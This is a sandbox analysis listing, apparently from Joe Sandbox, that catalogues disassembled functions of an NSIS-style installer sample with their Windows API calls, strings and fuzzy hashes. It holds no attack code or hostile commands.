Function 004049DB Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049F6
GetMessagePos.USER32 ref: 004049FE
ScreenToClient.USER32(?,?), ref: 00404A18
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404A2A
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A50

Strings

f, xrefs: 00404A2C

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction ID: 2232a7e87341d92c9ad346ae082ec06308d60ff2d87fc7f715a57a5a5eae5b25
Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction Fuzzy Hash: E5018071E40219BADB00DB94CC41BFEBBB8AB45711F10412BBA10B61C0D7B465018BA5

Function 004055D6 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(?,?,0042A400), ref: 00405619
GetLastError.KERNEL32 ref: 0040562D
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405642
GetLastError.KERNEL32 ref: 0040564C

Strings

ts@, xrefs: 004055DC
ds@, xrefs: 0040560B

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: ds@$ts@
API String ID: 3449924974-968229870
Opcode ID: f10b22bb5142ab39e3e91bc7df170e02474760785f1b3b99a39c7e09e389b4b4
Instruction ID: f6395dc840433d181f75b3fc8fae80690a43e09e82cbb082af9cf45b84ce1534
Opcode Fuzzy Hash: f10b22bb5142ab39e3e91bc7df170e02474760785f1b3b99a39c7e09e389b4b4
Instruction Fuzzy Hash: 82010871D04259EAEF119FA0DC44BEFBFB8EB14314F008576D908B6280D779A604CFAA

Function 00402C13 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C2E
wsprintfA.USER32 ref: 00402C62
SetWindowTextA.USER32(?,?), ref: 00402C72
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402C84

Strings

unpacking data: %d%%, xrefs: 00402C50, 00402C60
verifying installer: %d%%, xrefs: 00402C57

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: ef5ff3cba37bdb2e26199f17b8c5be3437539e0f0002abd4d10d443ac5288961
Instruction ID: e0e458c2d16b5d3c5a169a1492fe07981551179f6e5c56f92d0567975436b572
Opcode Fuzzy Hash: ef5ff3cba37bdb2e26199f17b8c5be3437539e0f0002abd4d10d443ac5288961
Instruction Fuzzy Hash: 35F0317090420DABEF205F60CD0AFAE3769EB04345F00C43AFA16B51D0D7B99A55CB59

Function 00406222 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406239
wsprintfA.USER32 ref: 00406272
LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00406286

Strings

%s%s.dll, xrefs: 0040626C
\, xrefs: 0040624A
UXTHEME, xrefs: 0040622B

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: c7ba92785c192ffb77ecdfb90d0fa47c7b7783556fece6129122b9a6395f8fae
Instruction ID: 4eb1d724573375327ef03b870ab6fb06d37159ba94d5fa14c1e1425601a81350
Opcode Fuzzy Hash: c7ba92785c192ffb77ecdfb90d0fa47c7b7783556fece6129122b9a6395f8fae
Instruction Fuzzy Hash: A2F0FC3090011AA7DB24B768DC0DFEB365CAB08305F1401BAA546E11D1D578F9258B69

Function 00402749 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027B9
GlobalFree.KERNEL32(?), ref: 004027F2
GlobalFree.KERNEL32(00000000), ref: 00402805
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040281D
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402831

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 127938ffedbdb685085fdf40d0208ae81fb03e7592c7cd39d7ae25b5127f120c
Instruction ID: 589acf511f7bba285ed25554ef0f071862dbcd9cf46fffc414e4c77000f41e55
Opcode Fuzzy Hash: 127938ffedbdb685085fdf40d0208ae81fb03e7592c7cd39d7ae25b5127f120c
Instruction Fuzzy Hash: 5E219A71C04128BBCF216FA5CE89DAE7A79AF09324F14423AF520762E1C6795D40DBA9

Function 00406162 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,00429000,75923410,0042A400,00000000,0040329A,0042A400,0042A400,004034AF), ref: 004061BA
CharNextA.USER32(?,?,?,00000000), ref: 004061C7
CharNextA.USER32(?,00429000,75923410,0042A400,00000000,0040329A,0042A400,0042A400,004034AF), ref: 004061CC
CharPrevA.USER32(?,?,75923410,0042A400,00000000,0040329A,0042A400,0042A400,004034AF), ref: 004061DC

Strings

*?|<>/":, xrefs: 004061AA

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 2fcb21d4fe3ff3b998ebc2bd8af41eb25bf4dc23d8027269f2ae341fb2b2b84f
Instruction ID: 28f88d73301ddfe76a8902f897fcc58808f561dcfc6ac49559e28e986a88295b
Opcode Fuzzy Hash: 2fcb21d4fe3ff3b998ebc2bd8af41eb25bf4dc23d8027269f2ae341fb2b2b84f
Instruction Fuzzy Hash: AF11C8718083912DFB3216644C44B777F998F9A760F19007BE9D6762C3C67C5C53826D

Function 00401759 Relevance: 7.6, APIs: 5, Instructions: 147stringtimeCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(00000000,00000000,00409400,00429800,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,00409400,00409400,00000000,00000000,00409400,00429800,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 00405EF7: lstrcpynA.KERNEL32(?,?,00000400,0040336D,00422F20,NSIS Error), ref: 00405F04

Part of subcall function 00405110: lstrlenA.KERNEL32(0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000,?), ref: 00405149
Part of subcall function 00405110: lstrlenA.KERNEL32(00402D22,0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000), ref: 00405159
Part of subcall function 00405110: lstrcatA.KERNEL32(0041F510,00402D22,00402D22,0041F510,00000000,00000000,00000000), ref: 0040516C
Part of subcall function 00405110: SetWindowTextA.USER32(0041F510,0041F510), ref: 0040517E
Part of subcall function 00405110: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A4
Part of subcall function 00405110: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051BE
Part of subcall function 00405110: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051CC

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: 385cb254830b3dbcb0c35d99c8dbf43eaeb3157a66b4005c67f4322c39a81f81
Instruction ID: 1ba5c428860e61568eef0a4ccac71dac967fbf7ecb8295bcfefdc03a30224d69
Opcode Fuzzy Hash: 385cb254830b3dbcb0c35d99c8dbf43eaeb3157a66b4005c67f4322c39a81f81
Instruction Fuzzy Hash: 2341F471A04515BACF107BB5DC45EAF3678EF41328B20823BF021B11E2DA3C8A419FAD

Function 00402B0E Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402B2F
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B6B
RegCloseKey.ADVAPI32(?), ref: 00402B74
RegCloseKey.ADVAPI32(?), ref: 00402B99
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402BB7

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: ba179b4ab06ec51544505c7bb4ef6d82f25395ff453b8f9fc11c3f7a3e81ed6a
Instruction ID: cbb66f3b7e8ae2888f759c75a40f8dd5de3b5766fb854263a8955dc236021e84
Opcode Fuzzy Hash: ba179b4ab06ec51544505c7bb4ef6d82f25395ff453b8f9fc11c3f7a3e81ed6a
Instruction Fuzzy Hash: 39117C71A00108FFDF11AF90DE89DAA3B7DEB54345F004076FA05F10A0D378AE51AB69

Function 00401D95 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D98
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
ReleaseDC.USER32(?,00000000), ref: 00401DCB
CreateFontIndirectA.GDI32(0040A808), ref: 00401E1A

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 384e23ba8be56f1d8b58cd2f78efa8b6131d55f969df9b920b0b3fd3205056ac
Instruction ID: 31dc6bfce766dd2e9c365b6b9c1ce0fa0646d0edadaed3ffd0317ad467dc8ee1
Opcode Fuzzy Hash: 384e23ba8be56f1d8b58cd2f78efa8b6131d55f969df9b920b0b3fd3205056ac
Instruction Fuzzy Hash: 1E017572948340AFE7006B74AE4EB993FF4DB95315F10847AF201B62E2C6B905528F6E

Function 00401D3B Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401D3F
GetClientRect.USER32(00000000,?), ref: 00401D4C
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
DeleteObject.GDI32(00000000), ref: 00401D8A

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: bd1a246c87c7f6178c6ecc63fdf164811e3027df84ebbbc61871bc77a69c7b8e
Instruction ID: 3a73a5ecaa8fddf8dab02391599d10e6f088d4e67d6af50185a53a7dc2f76cba
Opcode Fuzzy Hash: bd1a246c87c7f6178c6ecc63fdf164811e3027df84ebbbc61871bc77a69c7b8e
Instruction Fuzzy Hash: D6F0FFB2A04119BFDB11EBA4DE88DAFBBBCEB44301B104476F601F2191C6749D018B79

Function 00401C04 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C

Strings

!, xrefs: 00401C40

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: ddb3ae1d6e1b3602016cf6e102a5b51033461e7a55de6e6a3b1605d6dd40c2f8
Instruction ID: 023f80fe09a274ffd38664002148efa248b1b49841e283c842910b226ff12a9e
Opcode Fuzzy Hash: ddb3ae1d6e1b3602016cf6e102a5b51033461e7a55de6e6a3b1605d6dd40c2f8
Instruction Fuzzy Hash: BA219171A44208BEEB15EFA4DA46AED7FB1EF84314F24403EF101B61D1DA7886408B28

Function 004048D1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0041FD30,0041FD30,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047EC,000000DF,00000000,00000400,?), ref: 0040496F
wsprintfA.USER32 ref: 00404977
SetDlgItemTextA.USER32(?,0041FD30), ref: 0040498A

Strings

%u.%u%s%s, xrefs: 00404959

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 82e12f032b3efd850847d5b584d2a8547bd6d54b12269a14f91348113f1031b8
Instruction ID: 7f1be1aa0c85ccb86495671cb382a06f82cddcf8175a130fa0267404931b34df
Opcode Fuzzy Hash: 82e12f032b3efd850847d5b584d2a8547bd6d54b12269a14f91348113f1031b8
Instruction Fuzzy Hash: CF11B7736041283BDB0065799D45EAF3298DB85374F250637FA25F21D1E978CC1255EC

Function 004023D3 Relevance: 6.1, APIs: 4, Instructions: 73registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402411
lstrlenA.KERNEL32(00409C00,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402431
RegSetValueExA.ADVAPI32(?,?,?,?,00409C00,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040246E
RegCloseKey.ADVAPI32(?,?,?,00409C00,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040254F

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: 65fbc6128c6ea6ccac0771d36d25ae40eb91bbe92aaef5046d3fe99f3cf24475
Instruction ID: 45e6817f5ac0ad5077c8573445b5e51b6f54d3a00a8772886ac111494e5e57ea
Opcode Fuzzy Hash: 65fbc6128c6ea6ccac0771d36d25ae40eb91bbe92aaef5046d3fe99f3cf24475
Instruction Fuzzy Hash: B52181B1E00109BEEB10EFA4DE49EAF7BB8EB54358F20403AF505B61D1D6B95D019B28

Function 00401FFF Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 0040202A

Part of subcall function 00405110: lstrlenA.KERNEL32(0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000,?), ref: 00405149
Part of subcall function 00405110: lstrlenA.KERNEL32(00402D22,0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000), ref: 00405159
Part of subcall function 00405110: lstrcatA.KERNEL32(0041F510,00402D22,00402D22,0041F510,00000000,00000000,00000000), ref: 0040516C
Part of subcall function 00405110: SetWindowTextA.USER32(0041F510,0041F510), ref: 0040517E
Part of subcall function 00405110: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A4
Part of subcall function 00405110: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051BE
Part of subcall function 00405110: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051CC

LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040203A
GetProcAddress.KERNEL32(00000000,?), ref: 0040204A
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B4

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: b9f0aec67fea9bc98c5863c357296edba73ca0e05b72c9a1f083ca6005b565f3
Instruction ID: 7d08e1e337802b2334af88e0c199d29f708e40c37bf94ee781fb5d0f0b1c297d
Opcode Fuzzy Hash: b9f0aec67fea9bc98c5863c357296edba73ca0e05b72c9a1f083ca6005b565f3
Instruction Fuzzy Hash: 7B219571E00225F7DB207FA48E49A6E7A74AB44354F20417BF601B22D1D6BE4A42965E

Function 00405084 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004050B3
CallWindowProcA.USER32(?,?,?,?), ref: 00405104

Part of subcall function 00404128: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040413A

Strings

, xrefs: 00405094

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 0b9e3fe4afe9fd5950d24fc38bd805c0ffc83546a9c92a8d1e346af401a4be56
Instruction ID: e292fc6bb5149b142bd52d3e096dd2ae09329e4c6d4eed70fd370e7000aba408
Opcode Fuzzy Hash: 0b9e3fe4afe9fd5950d24fc38bd805c0ffc83546a9c92a8d1e346af401a4be56
Instruction Fuzzy Hash: B2018F71504609ABDF205F11ED84AEF3765EB84750F208037FA01B92D1C77A9D92AFAE

Function 00405B99 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405BAD
GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 00405BC7

Strings

nsa, xrefs: 00405BA4

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: fefc0482c854070ed442c91c2c9b831f833a608d20a08577fe9f9df7fb59a314
Instruction ID: bfd989d901498d13fd43eebbd57bf0dae5b4b0e38faf5f28c0e1a6b78de2ea97
Opcode Fuzzy Hash: fefc0482c854070ed442c91c2c9b831f833a608d20a08577fe9f9df7fb59a314
Instruction Fuzzy Hash: B7F082367086046BEB108F55EC04B9B7BACDF91750F10C03BFA08DA1D0E6B5F9548B59

Function 00405688 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421538,Error launching installer), ref: 004056B1
CloseHandle.KERNEL32(?), ref: 004056BE

Strings

Error launching installer, xrefs: 0040569B

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304069570.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 8605fb0cc1bd08462260b177f6e223d0fe872a64a1cb3e3de70a479640e30f4e
Instruction ID: a84e3f3112e4284354e87e930577f618970dfa48977d7da17d28cbc3385d6636
Opcode Fuzzy Hash: 8605fb0cc1bd08462260b177f6e223d0fe872a64a1cb3e3de70a479640e30f4e
Instruction Fuzzy Hash: 36E04FB0A002097FEB009B60EC05F7B7ABCE710204F808571BD01F2160D278A8008A78

Function 00406977 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3304000714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3303983037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304024016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3304041162.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
